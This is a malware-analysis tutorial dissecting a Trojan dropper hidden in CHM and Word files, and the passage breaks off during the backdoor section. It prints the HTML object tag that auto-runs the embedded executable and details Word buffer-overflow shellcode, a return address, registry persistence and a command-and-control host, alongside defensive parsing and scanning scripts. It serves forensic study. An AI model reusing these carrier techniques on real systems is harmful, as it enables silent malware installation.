
Page 1: Introduction to Malware Techniques and Logics Part 1 by Gunther

Author: Gunther

Editor: Shub-Nigurrath

ARTeam

INTRODUCTION TO MALWARE TECHNIQUES AND LOGICS PART 1


FOREWORDS

Following the great works by EvilCry, I have decided it’s time to release some of my past and present works on Malware Analysis (some of them will be coming soon), in the hope of igniting some interest in Malware Analysis from a Reverse Engineer’s mindset. This tutorial is written to provide a better understanding of where to find information and what the aim of most Trojans is. Their aim is simply to steal information or to act as a Bot in a Botnet. Please note that this article has been written for learning purposes and not for complex functionality. In the early days, there were many incidents where users received emails with malicious CHM (Microsoft Compiled HTML Help) and DOC (Microsoft Office Word Document) attachments containing Trojan Riler, which is also known as BackDoor-BCB. So I have decided to impart some of my knowledge on Forensics in order to complete this tutorial, writing “Introduction to Malware Techniques and Logics part 1”. The tutorial will cover different issues:

• How to decompile .CHM files
• How to detect and analyse the shellcode
• How to dump the backdoor components
• How to discover the communication protocol

I hope that this could begin a new chapter in the ongoing series of Reverse Engineering and Forensics guides from ARTeam and spark a new interest. Today’s topic will go over “Introduction to Malware Techniques and Logics part 1”.

This paper attempts to document an approach to how malware developers make use of macros and vulnerabilities to install malicious software on a vulnerable machine. We hope this document will help future Reverse Engineers and Forensics guys / gals to conduct more viable and comprehensive research. This article does not claim to be complete or exclusive, and is geared towards beginners.

[THIS TUTORIAL COMES WITH AN ARCHIVE “MALWARE_SAMPLE_BEWARE.ZIP”, WHICH CONTAINS THE MALWARE SAMPLES DISCUSSED HERE.

BEWARE THAT THIS SHOULD BE EXPLORED IN A SAFE ENVIRONMENT ONLY. WE MUST NOT BE CONSIDERED RESPONSIBLE FOR DAMAGES OR DATA LOSS YOU MIGHT HAVE, THE OPERATION IS TOTALLY AT YOUR OWN RISK.

PASSWORD: “INFECTED” AND THEN INTERNAL ZIP HAS PASSWORD “PASSWORD” ALL IN LOWERCASE AND WITHOUT QUOTES.]


1 TABLE OF CONTENTS

Forewords ....................................................................................................................................................... 2

Disclaimer/License ........................................................................................................................................... 4

Verification ...................................................................................................................................................... 4

1.1 Initial Analysis ............................................................................ 5
1.1.1 Focus on Analysis ........................................................................ 5
1.1.2 Verification of CHM file format ........................................................... 6
1.1.3 Interesting Information Extracted from chm File Format .................................... 7

1.2 Decompilation Process of .CHM file .......................................................... 8
1.2.1 Extraction of Internal files within .CHM file ............................................. 8
1.2.2 Analysing the .htm file ................................................................... 9
1.2.3 Analysing the Other Files ................................................................ 10
1.2.4 Converting back to HHP, HHC, HHK format .................................................. 10
1.2.5 Dumping of Trojan Dropper ................................................................ 12

1.3 Hiding within .Doc file ..................................................................... 13
1.3.1 Extraction of Streams from .Doc file ..................................................... 14
1.3.2 VBA Macros ............................................................................... 14
1.3.3 Finding Shellcode ........................................................................ 14
1.3.4 Let’s do some Shellcode Analysis ......................................................... 16
1.3.5 Microsoft Word Macro Name Buffer Overflow Vulnerability .................................. 17

1.4 Trojan Dropper Winsrv.exe ................................................................... 18
1.4.1 Dumping of BackDoor Components ........................................................... 19
1.4.2 Installation of BackDoor Components ...................................................... 20
1.4.3 BackDoor Component Files ................................................................. 20
1.4.4 Discovery of Communication Protocol ...................................................... 21
1.4.5 Deciphering of Communication Protocol .................................................... 22
1.4.6 Handshake ................................................................................ 22
1.4.7 Command Loop ............................................................................. 22
1.4.8 Multiple Sessions Supported .............................................................. 23
1.4.9 Information about the Controller ......................................................... 23

1.5 Conclusions ........................................................................................................................................ 23

2 INITIAL ANALYSIS 24

2.1 Preliminary Analysis on the malware ................................................................................................. 24

2.2 Live Analysis on the malware ............................................................................................................. 25

2.3 HoneyPot Analysis on the malware .................................................................................................... 26


2.4 Conclusions ........................................................................................................................................ 30

3 APPENDIX A: CONTENT OF THE .HTM FILE 31

4 APPENDIX B: DISASSEMBLY OF SHELLCODE 33

DISCLAIMER/LICENSE

All code included with this tutorial is free to use and modify; we only ask that you mention where you found it. This eZine is also free to distribute in its current unaltered form, with all the included supplements.

We have potentially illegal stuff inside. All the commercial programs used within our tutorials have been used only for the purpose of demonstrating the theories and methods described. These documents are released under the license of not using the information inside them to attack systems or programs for piracy. If you do, it will be against our rules. No distribution of patched applications has been done under any media or host. The applications used had most of the time already been patched by other fellows, and cracked versions had been available for a long time. ARTeam or the authors of the papers shouldn’t be considered responsible for damages to the companies holding rights on those programs. The scope of this document, as well as any other ARTeam tutorial, is sharing knowledge and teaching how to patch applications, how to bypass protections and generally speaking how to improve the RCE art. We are not releasing any cracked application. We are not at all encouraging people to release cracked applications; damages, if there are any, have to be claimed from persons badly using information, not under our license.

This disclaimer applies to all ARTeam releases and tutorials!

VERIFICATION

ARTeam.esfv can be opened in the ARTeamESFVChecker to verify all files have been released by ARTeam and are unaltered. The ARTeamESFVChecker can be obtained in the release section of the ARTeam site: http://releases.accessroot.com


2 SAMPLE NUMBER ONE

2.1 INITIAL ANALYSIS

I will start off this Malware Analysis with an introduction to how the Trojan is being pushed out to the public and targeted people, and then move on to the actual dissection of the whole thing. There were incidents in which many users received emails with malicious CHM (Microsoft Compiled HTML Help) and DOC (Microsoft Office Word Document) attachments containing Trojan Riler (also known as BackDoor-BCB). Trojan Riler has two distinct groups of components playing different roles:

I. Trojan dropper WINSRV.EXE or WINHEINI.EXE (they are the same), which is dumped from the carrier files (CHM and DOC) when these carrier files are opened. When this dropper is executed, it drops and installs the backdoor components.

II. Backdoor components (WINSSI.EXE, SPORDER.DLL, WINMEDL.DLL and SYNUSB.DLL) that are dumped by the Trojan dropper. These backdoor components provide functionality to connect to a remote host to allow for remote control and remote access to the compromised machines.

During the analysis of the emails, I learnt that the address of the sender had been spoofed. This analysis will describe the process on these two malicious attachments to extract information about the attackers and also to reverse-engineer the functionalities of all the Trojan components.

2.1.1 FOCUS ON ANALYSIS

I have received 2 samples of this malware in the form of .chm and .doc files, and I found out that the Trojan was embedded in (or compiled into) the CHM file in compressed form (LZH). My analysis will focus on the following:

I. Verify the declared file types of the carriers of the Trojan dropper. (This step is important as it will aid us in choosing the correct tools so that we can dissect the files for further analysis.)
II. Clues that can be extracted from the carriers of the Trojan dropper.
III. Functions of the Trojan dropper WINSRV.EXE or WINHEINI.EXE.
IV. Functions of the backdoor components (WINSSI.EXE, SPORDER.DLL, SYNUSB.DLL and WINMEDL.DLL) that are dropped by the Trojan dropper, WINSRV.EXE.


2.1.2 VERIFICATION OF CHM FILE FORMAT

In order to verify whether the .chm file is really just another innocent .chm file, I decided to use a Hex Editor to view its content. You can find more information on Microsoft’s HTML Compiled Help (.CHM) Format published here:

http://www.speakeasy.org/~russotto/chm/chmformat.html
http://bonedaddy.net/pabs3/chmspec/0.1.2/Formats.html

Figure 1 – Hex-Editor View of Sample.chm


2.1.3 INTERESTING INFORMATION EXTRACTED FROM CHM FILE FORMAT

There is some interesting information that we can extract from sample.chm, so we need to understand the .CHM file headers first.

File Offset: Content at File Offset:
0000: char[4] ‘ITSF’
0004: DWORD 0x03 (Version number)
0008: DWORD 0x60 or 96 (Total header length)
000C: DWORD 0x01 (Unknown)
0010: DWORD A timestamp. With reference to http://bonedaddy.net/pabs3/chmspec/0.1.2/ITSF.html, this is derived from the GetFileTime() function and is the value of the dwLowDateTime member of the last write time parameter.
0014: DWORD 0x0804 = Chinese Simplified [1] (Windows Language ID). With reference to http://bonedaddy.net/pabs3/chmspec/0.1.2/ITSF.html, this ID is the user language ID (from GetUserDefaultLCID) of the Operating System at the time of compilation.
0018: GUID 10 fd 01 7c aa 7b d0 11 9e 0c 00 a0 c9 22 e6 ec = 7C01FD10-7BAA-11D0-9E0C-00A0-C922-E6EC
0018: GUID 11 fd 01 7c aa 7b d0 11 9e 0c 00 a0 c9 22 e6 ec = 7C01FD11-7BAA-11D0-9E0C-00A0-C922-E6EC

Table 1 – Main Header of .chm file format

File Offset: Content at File Offset:
0030: DWORD $0409 = English (Windows Language ID). With reference to http://bonedaddy.net/pabs3/chmspec/0.1.2/ITSF.html, this came from the program that compiled the ITSF. On Win32, it comes from ITSS.DLL (a Microsoft HTML Help Author DLL).

Table 2 – Portion of Directory Header of .chm file format

From the above two tables, we can deduce that the primary language of the Operating System used by the attacker who crafted the CHM was probably Chinese Simplified, according to the language ID in the main header of the CHM (the English ID in the directory header comes from the compiler, not from the user’s system).

[1] Language ID to Language Name translation information obtained from http://windowsitpro.com/article/articleid/15816/where-in-the-registry-is-the-language-setting-for-each-user-stored.html “Where in the registry is the language setting for each user stored?”
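The header fields in Tables 1 and 2 can be pulled out programmatically instead of read off a hex dump. The following parser is an added example written for this edit, not code from the tutorial or from the chmdeco project. It assumes the ITSF layout in Table 1 with the second GUID following the first at 0x28, a directory (ITSP) header that the caller has already located, and a constructed header built from the values in the tables rather than bytes from the real sample. Note that Python's uuid module decodes the on-disk little-endian GUID bytes into the standard 8-4-4-4-12 grouping.

```python
import struct
import uuid

ITSF_MAGIC = b"ITSF"
ITSP_MAGIC = b"ITSP"

# Windows language IDs mentioned in the tables (constructed lookup; extend as needed)
LANGUAGE_IDS = {0x0804: "Chinese Simplified (PRC)", 0x0409: "English (United States)"}


def parse_itsf_header(data: bytes) -> dict:
    """Decode the ITSF main header fields listed in Table 1."""
    if data[:4] != ITSF_MAGIC:
        raise ValueError("not an ITSF (CHM) file")
    version, header_len, unknown, timestamp_low, lang_id = struct.unpack_from("<5I", data, 4)
    # GUIDs are stored little-endian on disk (Data1/2/3 byte-swapped), like a CLSID
    guid1 = uuid.UUID(bytes_le=data[0x18:0x28])
    guid2 = uuid.UUID(bytes_le=data[0x28:0x38])   # assumed: second GUID directly follows the first
    return {
        "version": version,
        "header_length": header_len,
        "timestamp_low": timestamp_low,   # dwLowDateTime only; not convertible to a date by itself
        "language_id": lang_id,
        "language": LANGUAGE_IDS.get(lang_id, "unknown"),
        "guid1": str(guid1).upper(),
        "guid2": str(guid2).upper(),
    }


def parse_itsp_language(dir_header: bytes) -> int:
    """Language ID at offset 0x30 of the directory (ITSP) header, as in Table 2."""
    if dir_header[:4] != ITSP_MAGIC:
        raise ValueError("not an ITSP directory header")
    return struct.unpack_from("<I", dir_header, 0x30)[0]


def language_summary(main_header: bytes, dir_header: bytes) -> dict:
    """OS language of the authoring machine versus the compiler's own language."""
    h = parse_itsf_header(main_header)
    compiler_lang = parse_itsp_language(dir_header)
    return {
        "authoring_os_language": h["language"],
        "compiler_language": LANGUAGE_IDS.get(compiler_lang, "unknown"),
    }


# Constructed headers carrying the values from Tables 1 and 2 (not the real sample.chm)
SAMPLE_ITSF = (
    ITSF_MAGIC
    + struct.pack("<5I", 3, 0x60, 1, 0x4DB7EB78, 0x0804)
    + bytes.fromhex("10fd017caa7bd0119e0c00a0c922e6ec")
    + bytes.fromhex("11fd017caa7bd0119e0c00a0c922e6ec")
).ljust(0x60, b"\0")
SAMPLE_ITSP = (ITSP_MAGIC + b"\0" * 0x2C + struct.pack("<I", 0x0409)).ljust(0x54, b"\0")

if __name__ == "__main__":
    print(parse_itsf_header(SAMPLE_ITSF))
    print(language_summary(SAMPLE_ITSF, SAMPLE_ITSP))
```

Run against a real file, the first 0x60 bytes are the main header; the directory header has to be located from the header section table, which this example deliberately leaves to the caller.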


2.2 DECOMPILATION PROCESS OF .CHM FILE

OK, now that we have identified that there is indeed an .exe file within the .chm carrier file, let’s try to decompile it and extract the .exe file. We are going to use a CHM decompiler, chmdeco, from http://bonedaddy.net/pabs3/hhm/#chmdeco. It is a program that converts the internal files of CHM files back into the hhp, hhc, hhk etc. files that are used to compile the CHM documentation. Before we even begin to convert the .chm file back into hhp, hhc, hhk etc., the .exe file needs to be extracted.

2.2.1 EXTRACTION OF INTERNAL FILES WITHIN .CHM FILE

For the extraction process, I am going to use a utility, istorage.exe, that comes with the chmdeco package. It can extract files (streams) from Microsoft compound file objects (also known as Microsoft OLE2 files or Microsoft Structured Storage) and also extract files from CHM files. This is done through the OLE StgOpenStorage function, the IStorage interface (for Microsoft compound file objects) and the ITStorage interface (InfoTech Storage, for CHM files). The source code of istorage.exe can be obtained at:

http://bonedaddy.net/pabs3/prog.html#istorage.

Figure 2 – Listing of the files within Sample.chm

As expected, we found the Trojan dropper, WINSRV.EXE, in the listing of the directory into which we extracted the files. The .htm file is the visible content of the CHM file and we will analyse it later.


Detailed format interpretation of various files can be found at:

http://bonedaddy.net/pabs3/chmspec/0.1.2/Formats.html

2.2.2 ANALYSING THE .HTM FILE

Basically, the .htm file which I extracted is the HTML content of the .chm file. I will show the content of the .htm file in Appendix A. The .htm file also contains two sections of exploit code which try to embed and launch the embedded Trojan dropper executable. The following information was found in the MHA.HTM file:

I. The .htm file was generated using Microsoft Word 9 (part of Office 2000).
II. The author of the .htm file had the initials “lw”.
III. A directory name was observed in <link rel=File-List href="./Sample.files/filelist.xml">.
IV. The date/time of creation of MHA.HTM was roughly 01 September 2004 07:15 GMT/UTC, derived from “2004-09-01T07:15Z”.
V. The date/time of last save of MHA.HTM was roughly 01 September 2004 07:15 GMT/UTC, derived from “2004-09-01T07:15Z”.
VI. The registered company for Microsoft Word 9 (part of Microsoft Office 2000) was “software”.
VII. The exploit code to embed the Trojan dropper WINSRV.EXE into the CHM is probably: <BODY nmouseup=document.selection.empty() oncontextmenu="return false" onselectstart="return false" ondragstart="return false" onbeforecopy="return false" oncopy=document.selection.empty() onselect=document.selection.empty() background="winsrv.exe">
VIII. The exploit code to execute the Trojan dropper WINSRV.EXE is probably: <OBJECT id=RUNIT height=0 width=0 style="display:none;" type="application/x-oleobject" codeBase=winsrv.exe ></OBJECT>


2.2.3 ANALYSING THE OTHER FILES

Basically, we should view the other files in a hex editor as well, but one file of interest is the #SYSTEM file. It showed content with the Chinese Simplified characters 木马, meaning Trojan. In addition, the name of the sample.htm was also displayed.

Figure 3 – Hex Editor view of #SYSTEM

Things to note when analysing the #SYSTEM file: it also contained a time_t timestamp (DWORD) at file offset 0x08, and the value was 0x41364D19 (1094077721 seconds after 00:00 Jan 1 1970 UTC/GMT). This timestamp was derived from the Windows GetLocalTime() function. The value translated to 01 September 2004 22:28:41 GMT/UTC. This could also be the date of CHM compilation. A FILETIME structure with dwHighDateTime and dwLowDateTime values of 0x01C48FF5 and 0x4DB7EB78 respectively was found at file offsets 0x42 and 0x3E. This translated to 01 September 2004 7:28:40 GMT/UTC (the Windows GetSystemTimeAsFileTime() function is used to generate this timestamp and the format is UTC).

2.2.4 CONVERTING BACK TO HHP, HHC, HHK FORMAT

The purposes of the various file types can be found here: http://bonedaddy.net/pabs3/chmspec/0.1.2/Authoring.html. But for convenience, I will write it here for everyone.

• HHP files are HTML Help Project files and store information on options, window types, merge info, a file list, text popups, information types, context-sensitive help, and subsets, and are in INI format. Parts of the HHP format can be excised into text files and included from the HHP. http://bonedaddy.net/pabs3/chmspec/0.1.2/INI.html#HHP
• HHC files are HH Table of Contents files, store the Contents and are in Sitemap format.
• HHK files are HH Index files, store the Index and are in Sitemap format.
• HHS files are HH Samples files, store the samples information and are in INI format.
• STP files are HH Stop-list files, store the words to be ignored when generating search data and are in text format.
• ALI files are HH alias files, store context-sensitivity links and are in text format.


The whole directory of PRESS.CHM.CONTENT was dragged into chmdeco.exe. A new directory “#recreation” was created within it.

Figure 4 – Directory View of Extracted Files

Figure 5 – Directory View of #recreated

Again the Chinese Simplified characters 木马, meaning Trojan, were observed. The content of chm 木马.hhp is as follows:

;This HHP file was recreated by chmdeco 0.3 (by Pabs - http://pabs.zip.to)
;It is only an approximation of the original project file.
;Other files that may have been recreated with it are also only approximations.
;See the documentation for parts of the HHP that cannot be recreated.
;Input: C:\chmdeco 0.3\Press.chm.Contents
;Compiled by: HHA Version 4.74.8702
;Compilation date: 09/01/04 22:28:41 (1094077721 seconds after 0:00 Jan 1 1970)
[OPTIONS]
Binary Index=No
Compiled file=chm木马.chm
Default topic=Sample.htm
Language=0x804 Chinese (PRC)
[FILES]
Sample.htm
winsrv.exe


[INFOTYPES]

The following information was gathered from this chm 木马.hhp file:

I. The CHM file was compiled by HHA (Microsoft HTML Help Author, ITSS.DLL) Version 4.74.8702.
II. The CHM file was compiled on 01 September 2004 22:28:41 GMT.
III. The original output filename of the CHM compilation was chm木马.chm.
IV. The language option in chm 木马.hhp was 0x804 Chinese (PRC) (also known as Chinese Simplified).
V. Files MHA.HTM and WINSRV.EXE were used to compile chm木马.chm.

There was nothing of interest or suspicious in the file “Table of Content.hhc”.

2.2.5 DUMPING OF TROJAN DROPPER

If you get your VM ready and execute the .chm file within the controlled environment, the embedded Trojan dropper will be dumped into local storage under the filename WINSRV.EXE. The location is usually the Temporary Internet Files folder of the current user. WINSRV.EXE will then be executed in the least restrictive Local Computer Zone via the OBJECT tag and its CODEBASE attribute:

<OBJECT id=RUNIT height=0 width=0 style="display:none;" type="application/x-oleobject" codeBase=winsrv.exe ></OBJECT>

I have also observed that the “exploit code” (which is more likely a feature of HTML and CHM than a bug) in Sample.HTM embeds and executes the Trojan dropper. Surprisingly, it worked even on fully patched systems (see the table below). However, explicit double-clicking of the .CHM file is required. The effect is as though an .EXE attachment had been double-clicked.

Operating System: CHM able to dump & execute Trojan dropper?
Windows 98 Second Edition (Fully Patched): Yes
Windows 2000 Professional SP4 (Fully Patched): Yes
Windows XP Professional SP3 (Fully Patched): Yes

Table 3 – Operating Systems Tested


2.3 HIDING WITHIN .DOC FILE

I have also received samples of the same Trojan, but embedded in a .doc file. Now, how do we verify this file, as we did for the .chm file earlier on? Well, simply: if the .doc file is a Microsoft Office Word Document, it should be in the Microsoft OLE2 or Microsoft Structured Storage file format (a mini-filesystem structure within a file) and can be viewed in the DocFile Viewer that comes with Visual Studio or here:

http://support.microsoft.com/kb/139545

Figure 5 – DocFile Viewer displaying streams within DOC file

As you may have noticed, the “WordDocument” stream is present in the DOC file. It is known that a Microsoft Office Word Document has a CLSID (class identifier) of {00020906-0000-0000-C000-000000000046}, and such a CLSID will be present in a Microsoft Office Word Document. CLSID has the type definition:

typedef struct CLSID {
    DWORD Data1;
    WORD Data2;
    WORD Data3;
    BYTE Data4[8];
} CLSID;


Hence, the little-endian representation of DWORD Data1, the byte sequence “0x06, 0x09, 0x02, 0x00”, was used to search the DOC file in a Hex Editor for the Word Document CLSID.
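Searching on the first four bytes of Data1 alone, as done above, will also hit any unrelated dword with that value. The following added example (written for this edit, not code from the tutorial) derives the full on-disk byte order of the CLSID struct from the type definition and searches for the complete 16-byte form, which removes that ambiguity. It uses Python's uuid module, whose bytes_le property applies exactly the Data1/Data2/Data3 little-endian layout of the struct; the sample buffer is constructed for the demonstration and contains a deliberate 4-byte-only decoy.

```python
import uuid

# Word 97-2003 document CLSID as quoted in the text
WORD_DOCUMENT_CLSID = uuid.UUID("{00020906-0000-0000-C000-000000000046}")


def clsid_on_disk(clsid: uuid.UUID) -> bytes:
    """Serialise a CLSID the way the struct is laid out in memory and in the file:
    Data1 (DWORD), Data2 and Data3 (WORD) little-endian, Data4[8] as-is."""
    return clsid.bytes_le


def find_all(data: bytes, needle: bytes) -> list:
    """Every (possibly overlapping) offset of needle in data."""
    hits, start = [], 0
    while (i := data.find(needle, start)) != -1:
        hits.append(i)
        start = i + 1
    return hits


def find_clsid(data: bytes, clsid: uuid.UUID) -> list:
    """Offsets where the full 16-byte CLSID occurs."""
    return find_all(data, clsid_on_disk(clsid))


def clsid_at(data: bytes, offset: int) -> uuid.UUID:
    """Decode the 16 bytes at offset back into a CLSID (inverse of clsid_on_disk)."""
    return uuid.UUID(bytes_le=data[offset:offset + 16])


# Constructed buffer: one real CLSID at 0x40 and, at 0x60, a decoy whose first four
# bytes equal Data1 but whose remaining bytes do not (not taken from the real sample)
SAMPLE_DOC = (
    b"\x00" * 0x40
    + clsid_on_disk(WORD_DOCUMENT_CLSID)
    + b"\x00" * 0x10
    + b"\x06\x09\x02\x00" + b"\xff" * 12
)

if __name__ == "__main__":
    print("on-disk bytes:", clsid_on_disk(WORD_DOCUMENT_CLSID).hex())
    print("4-byte search :", [hex(o) for o in find_all(SAMPLE_DOC, b"\x06\x09\x02\x00")])
    print("16-byte search:", [hex(o) for o in find_clsid(SAMPLE_DOC, WORD_DOCUMENT_CLSID)])
```

The same two functions work for any other CLSID of interest, for example the ones used by OLE objects embedded in a document, by swapping the constant.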

2.3.1 EXTRACTION OF STREAMS FROM .DOC FILE

The istorage.exe utility that comes with the previously mentioned chmdeco package was used to extract the various streams of the DOC file into individual files. The following list of files was obtained from the extraction.

2.3.2 VBA MACROS

Now that we have extracted the streams from the .doc file, we can check whether a VBA (Visual Basic for Applications) macro is present in the .doc file. If there is, there will be a “\MACROS\VBA” directory structure within the DOC file when viewed in the DocFile Viewer or extracted with istorage.exe. A VBA source code extraction program (source code available from the ClamWin project) was used to extract the information from the VBA project and code. VBA_EXTRACT.C was compiled in Linux and all the VBA files in \MACROS\VBA were copied there. “.\VBA_EXTRACT .” was executed and the result obtained. Alternatively, you can download OfficeMalScanner by Frank Boldewin and use it to extract the VBA too:

http://www.reconstructer.org/code/OfficeMalScanner.zip

2.3.3 FINDING SHELLCODE

As I was shit out of luck back then (there was no obvious VBA code that could have dumped and executed the Trojan dropper), I suspected that there could be an exploit that tried to use a Word vulnerability to dump and execute the Trojan dropper payload. I was lucky that searching for the string “.EXE” (case-insensitive) in the .doc file yielded a region at file offset 0x1A70 within the DOC file that looked like embedded shellcode.


Figure 5 – Hex View of Suspected Shellcode

After analyzing the file again, I found traces of strings that are Windows API names, such as GetProcAddress, CreateFileA, WriteFile, ReadFile and CreateProcessA, and filenames such as winheini.exe and MyDoc.doc. If these strings were part of the shellcode, then the shellcode would be in front of these strings. So I searched backwards from the region, and what immediately caught my eye was a string of NOPs (0x90) at file offset 0x17E0, which made me suspicious. This could be part of the shellcode, as a string of NOPs (0x90) is usually used as a “slide” into the shellcode. Thus, I saved the region starting from file offset 0x17E0 and ending at file offset 0x1B37 as a binary file. The file size was 856 bytes. The file was passed into IDA Pro for analysis and the result looked pretty promising. Looking at the disassembled code in Appendix B, there were a few indicators that this could be the shellcode. For example, the shellcode tried to find its own address within memory using “call $+5”, which means call the function at address (current EIP + 5).


The instruction at the call target is “pop ebx”. The call saves the return address, which is the address of “pop ebx”, onto the stack; “pop ebx” then retrieves that return address from the stack, and hence register ebx contains the location of the shellcode within memory. The shellcode also made use of the Process Environment Block [2] (PEB), which was at the fixed address 0x7FFDF000. [eax+0Ch] pointed to _PEB_LDR_DATA.

2.3.4 LET’S DO SOME SHELLCODE ANALYSIS

The rough idea of finding and doing shellcode analysis is as follows:

1. Find the base address of kernel32.dll, which is in fact the handle value of kernel32.dll.
2. Loop, calling function sub_1CE (arbitrarily named by IDA Pro) with the handle of kernel32.dll and an API name string to get the function address of that API. The addresses of these APIs are obtained:

seg000:00000298 aExitprocess db 'ExitProcess',0
seg000:000002A4 aWinexec db 'WinExec',0
seg000:000002AC aClosehandle db 'CloseHandle',0
seg000:000002B8 aSetfilepointer db 'SetFilePointer',0
seg000:000002C7 aLstrcata db 'lstrcatA',0
seg000:000002D0 aGetsystemdirec db 'GetSystemDirectoryA',0
seg000:000002E4 aGetprocaddress db 'GetProcAddress',0
seg000:000002F3 aCreateprocessa db 'CreateProcessA',0
seg000:00000302 aCreatefilea db 'CreateFileA',0
seg000:0000030E aWritefile db 'WriteFile',0
seg000:00000318 aReadfile db 'ReadFile',0
seg000:00000321 aGetlasterror db 'GetLastError',0
seg000:0000032E aRtlzeromemory db 'RtlZeroMemory',0

3. Get the path of the system directory (system32 in Windows NT and above, system in Windows 9x) and create WINHEINI.EXE.
4. Read from file offset 0x6E00 (hard-coded in the shellcode) in the DOC file and write the binary content of Trojan Riler to WINHEINI.EXE.
5. Execute WINHEINI.EXE.

[2] Process Environment Block is a high-level user-mode structure that contains some important information about the current process. www.alex-ionescu.com/part1.pdf

seg000:00000007 call $+5 ; Call Procedure

seg000:0000000C pop ebx


2.3.5 MICROSOFT WORD MACRO NAME BUFFER OVERFLOW VULNERABILITY

I have looked at the past vulnerabilities of Microsoft Word and found one about the Microsoft Word Macro Name Buffer Overflow. With reference to the “Microsoft Word Macro Name Buffer Overflow Vulnerability” published at http://addict3d.org/index.php?page=viewarticle&type=security&ID=97 and dated 17 October 2003, I found out that the length of the Unicode macro name declared at file offset 0x135B was 0x500 (1280) Unicode characters. This exceeded the hard-coded limit of 256 Unicode characters in Microsoft Word. If the exploit is successful, around 2560 bytes (1280 x 2) will be copied onto the stack. On a fully patched Windows XP with Office 2003, I used OllyDbg to attach to the WINWORD.EXE process prior to opening the .doc file. An exception occurred at the instruction at address 0x300057B3:

300057AE 1010 ADC BYTE PTR DS:[EAX],DL
300057B0 0F10FF MOVUPS XMM7,XMM7
300057B3 FFFC ??? ; Unknown command

Fortunately, this exception occurred; otherwise, more tracing effort would have been required. At this point in time, the partial content of the stack was:

0012CA6C 300057B1 WINWORD.300057B1
0012CA70 CCCCCCCC
0012CA74 00CCCCCC
0012CA78 00000000
0012CA7C 00000000
0012CA80 00000000
0012CA84 00000000
0012CA88 00000000
0012CA8C 00000000
0012CA90 00000000
0012CA94 00000000
0012CA98 00000000
0012CA9C 00000000
0012CAA0 90909000
0012CAA4 90909090
0012CAA8 000000E8
0012CAAC EB815B00
0012CAB0 00401015
0012CAB4 EC81EC8B
0012CAB8 00001000
0012CABC FDF000B8
0012CAC0 0C408B7F
0012CAC4 AD1C708B

Something must have overwritten a saved return address at 0x12CA6C with the value 0x300057B1 and caused the exception. In addition, ESP pointed to 0x12CAA4. The Microsoft Word version that the attacker used probably had an instruction like “jmp esp” at memory location 0x300057B1 of WINWORD.EXE to jump to the shellcode. Searching the DOC file content in a Hex Editor for “0xB1, 0x57, 0x00, 0x30” (the little-endian representation of 0x300057B1), we found that the address 0x300057B1 was hard-coded.


Later I found out that Microsoft Word in Office 2000 with Service Pack 3 had the same problem with this .doc file. A saved return address was overwritten with the value 0x300057B1 and ESP was pointing to the shellcode. However, the memory location 0x300057B1 did not contain the required instruction “jmp esp”.
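The three artefacts that led to the shellcode in sections 2.3.3 to 2.3.5 (a NOP slide, the “call $+5 / pop ebx” self-locating stub, and a hard-coded address stored little-endian) can be searched for automatically when triaging a suspicious document. The scanner below is an added example written for this edit, not code from the tutorial or from any tool it names. The sample buffer is constructed from the byte values visible in the stack dump above (call, pop ebx, sub ebx, and the mov eax, 7FFDF000h PEB reference), padded with filler; the offsets it reports are therefore the constructed ones, not offsets in the real .doc file.

```python
import struct

NOP = 0x90
POP_REG = range(0x58, 0x60)          # one-byte opcodes: pop eax .. pop edi
GETPC = b"\xe8\x00\x00\x00\x00"      # call $+5: pushes the address of the next instruction


def find_nop_sleds(data: bytes, min_len: int = 8) -> list:
    """Return (offset, length) for every run of at least min_len NOP bytes."""
    sleds, i = [], 0
    while i < len(data):
        if data[i] != NOP:
            i += 1
            continue
        j = i
        while j < len(data) and data[j] == NOP:
            j += 1
        if j - i >= min_len:
            sleds.append((i, j - i))
        i = j
    return sleds


def find_getpc_stubs(data: bytes) -> list:
    """Offsets of 'call $+5' immediately followed by a 'pop reg' (the GetPC idiom)."""
    n = len(GETPC)
    return [i for i in range(len(data) - n)
            if data[i:i + n] == GETPC and data[i + n] in POP_REG]


def find_address(data: bytes, addr: int) -> list:
    """Offsets where the 32-bit value addr is embedded little-endian, e.g. a
    hard-coded return address or the fixed PEB address 0x7FFDF000."""
    needle = struct.pack("<I", addr)
    return [i for i in range(len(data) - len(needle) + 1) if data[i:i + 4] == needle]


def scan(data: bytes, addresses=(0x300057B1, 0x7FFDF000)) -> dict:
    """Combine the three heuristics into one report keyed by artefact type."""
    return {
        "nop_sleds": find_nop_sleds(data),
        "getpc": find_getpc_stubs(data),
        "addresses": {hex(a): find_address(data, a) for a in addresses},
    }


# Constructed sample assembled from the instruction bytes in the stack dump above
SAMPLE = (
    b"\x00" * 0x20
    + struct.pack("<I", 0x300057B1)       # 0x20: hard-coded return address, little-endian
    + b"\xcc" * 8                         # 0x24: int3 filler
    + b"\x90" * 16                        # 0x2C: NOP slide
    + b"\xe8\x00\x00\x00\x00"             # 0x3C: call $+5
    + b"\x5b"                             # 0x41: pop ebx
    + b"\x81\xeb\x15\x10\x40\x00"         # 0x42: sub ebx, 401015h
    + b"\xb8\x00\xf0\xfd\x7f"             # 0x48: mov eax, 7FFDF000h (PEB)
    + b"\x8b\x40\x0c"                     # 0x4D: mov eax, [eax+0Ch]
    + b"\x00" * 8
)

if __name__ == "__main__":
    for kind, hits in scan(SAMPLE).items():
        print(kind, hits)
```

Each heuristic on its own produces false positives on ordinary binary data (0x90 runs are common padding, and any dword can coincide with an address), so the report is a triage aid that points at regions worth loading into a disassembler, not a verdict.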

2.4 TROJAN DROPPER WINSRV.EXE

The name of Trojan Riler was WINSRV.EXE in the .CHM file. For simplicity, “Trojan dropper WINSRV.EXE” shall be used from this point onwards to mean Trojan Riler. Trojan dropper WINSRV.EXE dumped the backdoor component files sporder.dll, winmedl.dll, WinSSi.exe and SynUsb.dll when executed. The target directory was the Windows System32 directory on Windows NT and above, and the Windows System directory in versions below Windows NT. Then it will add

"PackedCatalogItem" = "%System%\SynUsb.dll"

to the following registry key:

HKLM\SYSTEM\CurrentControlSet\Services\Winsock2\ParametersProtocol_Catalog9\Catalog_Entries\000000[Two random digits]

to add an LSP to the system TCP/IP stack. Once Trojan Riler is being executed, it will open a backdoor on the compromised system by connecting to a specified server. The Trojan then awaits commands from a remote attacker. The Trojan will then attempt to connect to UYGURMAN.VICP.NET on TCP port 53.


2.4.1 DUMPING OF BACKDOOR COMPONENTS

The algorithm for dumping and installing the backdoor components is as follows:

I. Determine the Windows system directory (Windows System32 directory or Windows System directory) via the GetSystemDirectory() API.
II. Try to get the attributes (via the GetFileAttributes() API) of winmedl.dll in the Windows system directory.
III. If the attributes contain READONLY, remove it (via the SetFileAttributes() API).
